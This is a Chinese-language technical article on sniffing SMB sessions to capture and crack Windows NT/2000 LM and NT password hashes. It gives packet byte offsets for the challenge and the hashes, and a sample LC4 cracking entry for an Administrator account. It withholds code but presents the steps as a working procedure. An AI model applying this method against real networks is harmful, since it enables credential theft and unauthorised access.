本文只是在技术上分析如何来通过sniffer来劫持winnt/2k的hash,对此文可能造成的危害不负任何责任。

引言:

近来SMB会话劫持的讨论占据了个大技术论坛不少的位置,吸引了不少人的目光,同时绿盟月刊37期、Phrack杂志60期和安全焦点峰会也刊登出了相关的文章,使得SMB会话劫持成为一个热点。由于是window设计上的缺陷,这是一种无法察觉又非常可怕的攻击方法。本文试图从SMB数据包分析的角度来说明如何截获winnt/2k的hash,具体的实现就不公布了,请读者牢记前面的声明。

说明:

为了使文章有针对性,关于SMB协议以及SMB会话过程就不谈了,用到的时候会一带而过,感兴趣的朋友请自行查询附录中的参考文档。文中提到的数据包如果没有特别说明都是通过Sniffer pro截获到的,并且为了分析方便,去掉了物理帧头、IP头和TCP头,只留下NETB和SMB部分。

正文:

假设两台机器,一台为Client A,一台为SMBServer B。

一、session的建立:

设法让A去访问B的特定资源,产生一个NETBIOS会话。A发送Session request,其中包括经过编码的NETBIOS名字。B在139端口监听连接,收到A的request后,B发送Session confirm,其中没有任何内容。这样就建立了一个有效的session。其中Session request数据包的NETB Type为0x81,Session confirm数据包的NETB Type为0x82,可以在程序中通过判断这两个标志来确定是否产生一个有效的session,然后就可以想办法截获SMB包了。

二、Challenge的获得:

当有效的session建立后,就开始进行连接的确认工作了,从这一步中可以得到B发送给A的由B随机产生的Challenge。

过程如下:A向B发送一个身份认证的请求,B随机产生一个8字节的Challenge发送给A,这个Challenge就包含在B发回给A的Server Response数据包中。用Sniffer pro截获这个包后,去掉物理帧头、IP头和TCP头,再去掉4个字节的NETB头,剩下的就是SMB包的内容,再去掉33个字节长的SMB Reponse header,然后向后做36个字节的偏移,下面的就是长度为8个字节的Challenge。这样就得到了我们需要的服务器随机产生的Challenge。

(由于本文的目的在于散列截获的实现,所以数据包内个字节内容的具体含义不做任何解释,只说明位置,下文也遵循这个原则。想深入了解的朋友请参阅附录的参考文档)

三、LM&NT HASH的获得:

A得到B发回的用于加密口令的Challenge后,向B发送建立空连接的请求,B返回Server Response包,此时IPC空连接成功建立。A然后发送LM&NT HASH给B,请求访问特定的资源,等待B的允许。我们需要做的就是截获A发送的这个SMB包。下面来看怎么拆解出HASH,还是去掉物理帧头、IP头和TCP头,再去掉4个字节的NETB头,剩下的就是SMB包的内容,再去掉33个字节长的SMB Reponse header,然后向后做28个字节的偏移,下面的24个字节的内容就是LM HASH,紧接着的24个字节就是NT HASH。现在我们就获得了A主机的LM HASH和NT HASH。

四、HASH的破解

前面已经获得了Challenge、LM HASH和NT HASH,现在我们做成lc文件格式,下面就是导入lc4来暴力破解了。lc的文件格式如下:

192.168.0.244 ADMINIST-7Z6A4E\Administrator:"":"":89E5E3F54A998398DC36E89DDD37334C801201CA39C9A5D3:8457623684F27A5EFA5FE7B647E87C36D78616F80594123C:E3A96FF4507B9EDF

后面的三列数字分别为LM HASH、NT HASH、Challenge。

五、总结

本文旨在于讨论winnt/2k下SMB会话劫持的实现,相关问题请查阅参考文档。因为入侵方法复杂,并且需要一定的基础,所以,掌握的人并不多。我已经尽量写地简单,只要按照以上的步骤去做就能实现,具体的代码实现就不写了,有兴趣的朋友自己去研究吧。

推广链接